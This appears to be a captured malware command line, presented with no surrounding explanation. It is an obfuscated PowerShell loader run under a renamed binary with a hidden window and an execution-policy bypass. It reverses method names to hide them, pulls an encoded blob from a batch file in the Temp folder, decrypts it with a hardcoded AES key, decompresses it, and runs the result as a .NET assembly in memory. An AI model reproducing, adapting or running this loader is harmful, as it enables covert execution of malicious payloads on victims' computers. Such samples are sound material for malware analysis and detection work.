"dub.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $utCHT = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\dub.bat').Split([Environment]::NewLine);foreach ($sWAOq in $utCHT) { if ($sWAOq.StartsWith(':: ')) { $upQKs = $sWAOq.Substring(3); break; }; };$JjLmi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($upQKs);$YkqlI = New-Object System.Security.Cryptography.AesManaged;$YkqlI.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YkqlI.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YkqlI.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kiFQHKEXvznY0Nsnm3fp94kgb604e6Feq9TQN777Yxs=');$YkqlI.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5Ca2LFqXHi3HVlKnNoz3+g==');$vFmBU = $YkqlI.CreateDecryptor();$JjLmi = $vFmBU.TransformFinalBlock($JjLmi, 0, $JjLmi.Length);$vFmBU.Dispose();$YkqlI.Dispose();$fuUUI = New-Object System.IO.MemoryStream(, $JjLmi);$gvEAD = New-Object System.IO.MemoryStream;$wMQDT = New-Object System.IO.Compression.GZipStream($fuUUI, [IO.Compression.CompressionMode]::Decompress);$wMQDT.CopyTo($gvEAD);$wMQDT.Dispose();$fuUUI.Dispose();$gvEAD.Dispose();$JjLmi = $gvEAD.ToArray();$vodVl = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($JjLmi);$UBeHH = $vodVl.EntryPoint;$UBeHH.Invoke($null, (, [string[]] ('')))